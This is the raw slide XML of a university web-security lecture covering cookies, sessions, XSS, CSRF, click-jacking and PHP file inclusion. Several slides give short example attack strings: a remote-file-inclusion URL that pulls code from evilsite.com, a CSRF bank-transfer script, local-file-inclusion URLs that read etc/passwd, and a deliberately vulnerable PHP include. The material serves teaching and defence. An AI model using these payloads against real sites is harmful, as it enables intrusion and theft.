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01" r:id="rId3"/>
    <p:sldId id="302" r:id="rId4"/>
    <p:sldId id="303" r:id="rId5"/>
    <p:sldId id="304" r:id="rId6"/>
    <p:sldId id="307" r:id="rId7"/>
    <p:sldId id="309" r:id="rId8"/>
    <p:sldId id="346" r:id="rId9"/>
    <p:sldId id="310" r:id="rId10"/>
    <p:sldId id="311" r:id="rId11"/>
    <p:sldId id="312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8" r:id="rId26"/>
    <p:sldId id="329" r:id="rId27"/>
    <p:sldId id="326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1" r:id="rId39"/>
    <p:sldId id="342" r:id="rId40"/>
    <p:sldId id="343" r:id="rId41"/>
    <p:sldId id="340" r:id="rId42"/>
    <p:sldId id="344" r:id="rId43"/>
    <p:sldId id="306" r:id="rId44"/>
    <p:sldId id="345" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="347" r:id="rId47"/>
    <p:sldId id="31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04" y="-2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C1B0-F88A-6D4C-AF45-7C323641153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0A16-098F-FC42-BD51-FFE69AFF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Wired equivalent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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0A16-098F-FC42-BD51-FFE69AFF9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8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Wi-FI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> protected access.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0A16-098F-FC42-BD51-FFE69AFF9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C0DF-989A-F54F-84CF-9415AE22BCFB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1482-53FB-DB40-AC1B-604175B0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talosintelligence.com/2017/03/apache-0-day-exploited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wasp.org/index.php/Category:OWASP_Top_Ten_Project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ISA 562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Information Security, Theory and Practice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Lecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>7: Web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blue slides borrowed from Goodrich and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tamassia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Formatting: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>italics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;  &lt;b&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>bold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lists: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;li&gt; First item&lt;/li&gt; &lt;li&gt;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item&lt;/li&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Links: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”&gt; text &lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripting code:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> &lt;script&gt; Code to execute &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Images: 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”&gt;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8047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Forms submit data using 2 methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET: variables are stored in the URL directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://www.example.com/form.html?first=Dov&amp;last=Gordon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Can be used when form data doesn’t impact the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST: variables sent in http request body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser warns you if attempt to re-send through navigation.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0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has no authentication or encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hypertext transport protocol over secure socket layer.  Default port 443 on server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now uses Transport Layer Security (TLS) instead.  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384" y="4505106"/>
            <a:ext cx="26933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41268" y="4143438"/>
            <a:ext cx="36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Supported ciphers and hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>funcs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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84" y="4908723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09785" y="4504645"/>
            <a:ext cx="277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Chosen cipher &amp; hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5384" y="5345587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55384" y="5841357"/>
            <a:ext cx="26933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90534" y="5471507"/>
            <a:ext cx="285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secret keys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3005" y="4908723"/>
            <a:ext cx="140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Certificate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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28906" y="6357624"/>
            <a:ext cx="26933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0933" y="5988292"/>
            <a:ext cx="361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data transfer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426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Scripting languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripting languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code that is executed by the browser (rather than compiled to machine code for CPU). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most popular (by far): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript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Stack Overflow survey (2015): 54.8% of developers use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side scripting languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run on the “back-end” by the web server.  Output is HTML that is displayed to the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to be PHP was the most popular. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recently, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>node.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as well.  (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304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control flow: while/for/if/else, F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>unction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>specification </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Event handlers such as onMouseOver, onClick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Can modify the html being displayed in response to user action, or time.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130543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HTTP is stateless, so no session information!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET or POST: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server uses a hidden form field to store session information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same or updated information is automatically (and transparently) “submitted” by the browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server uses session info, creates content, and embeds the session info again.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session information can be very sensitive!  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should use HTTPS if transferring session info this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Cookies: little bits of information, sent by the server and stored by the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key/Value pair </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exp. date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optional path, specifying which sub-directories on the server have access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352069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Cookie security features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser enforces certain rules: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mail.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can set a cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>example.com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and not vice versa.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nobody can set a cookie for another domain. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nobody can set a cookie for .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or .com, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>flag: cookie must be sent via HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP-Only: scripting languages cannot access or manipulate the cookie.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Cookie concerns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive data can be stored in these cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be accessed by users on the browser side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If stolen, might possibly be used as a login credential: session hijacking. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User privacy: they reveal where you’ve been!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cookies: if you request an image (e.g. ad) from another site, that server can also give a you cookie.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often done by advertisers to track usage statistics across sites, and to repeat ads.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6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Session IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server stores sessions, keeps the sensitive information off the client browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires space on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session ID is still communicated using prior methods.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should be hard to guess. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should have a short expiration time. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36901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Setup a fake host for an attacker to go after.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Put software with known vulnerabilities, allow packets through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>…  make it attractive. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intrusion detection: once they’ve connected, you can learn their IP address, their behaviors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evidence: spending time on the host, they will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>leave traces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in audit logs, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Diversion: they will be distracted from true assets. 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58627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Session hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to TCP session hijacking. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In fact, that is one way to hijack an HTTP session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another way: sniff the session ID, or session token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent TCP hijacking and packet sniffing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encrypt client-side session tokens. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side IDs should be unpredictable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tokens should expire at reasonable rates.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8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019" r="-12019"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1013125" y="268111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25707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Click-Jacking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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>onMouseUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(http://www.evilsite.com) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=http://www.trestedsite.com/&gt; Trust me! &lt;/a&gt;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12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9144000" cy="50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2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Scripting (XSS)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Nonpersistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Search results for: blah”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blah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= &lt;script&gt; cookie stealing code &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But how do we get the user to search for this? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embed the malicious search as GET field in a URL.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>search.html?query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=blah</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the client clicks on a link to this URL, their browser will try to display the search result, and will execute the malicious code. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95978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1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Boils down to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>sanitizing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Try to find “&lt;“ and replace with “\&lt;“, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not always easy to do!  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have to sanitize in all the the right places. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code obfuscation can make it hard to detect these snippets.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1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802.11 family of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdrds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in place of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ethernet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Specifies structure of wireless frames that encapsulate the higher levels of the IP stack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because wireless packets can easily be sniffed, the 802.11 included encryption early on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>… And did it very badly!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785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Get client to run code on 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party site at which they are logged in and trusted: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&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=http://www.naivebank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>transfer.php?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=10000&amp;from=Bob&amp;To=Alice &lt;/script&gt;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Login attack: get victim to login at 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party with attacker ID.  If they enter sensitive information while they’re logged in, attacker can recover it later through their own account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2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Server-side scripts are also very common.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generates HTML based on search results, user variables (GET/POST), etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Written in the HTML file, executed (interpreted) by the web server. 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Node.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Actually replaces the web server. Handles “events”, such as HTTP requests, fetches HTML from files and builds the page.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31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File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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> include(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>head.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>include($_GET[‘page’].”.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>include(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>foot.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”); ?&gt;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http://victim.com/index.php?page=http://evilsite.com/evilcode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file might include a web shell, for example. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Easily prevented: most PHP implementations now default to disallowing remote file inclusion.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423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Local-File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http://victim.com/index.php?page=admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>secretpage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http://victim.com/index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=etc/passwd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Or, an adversary might be able to upload their own malicious file.  E.g., suppose the server has a form for uploading images. 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27745" y="3896640"/>
            <a:ext cx="469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Tries to load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd.php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93531" y="3185040"/>
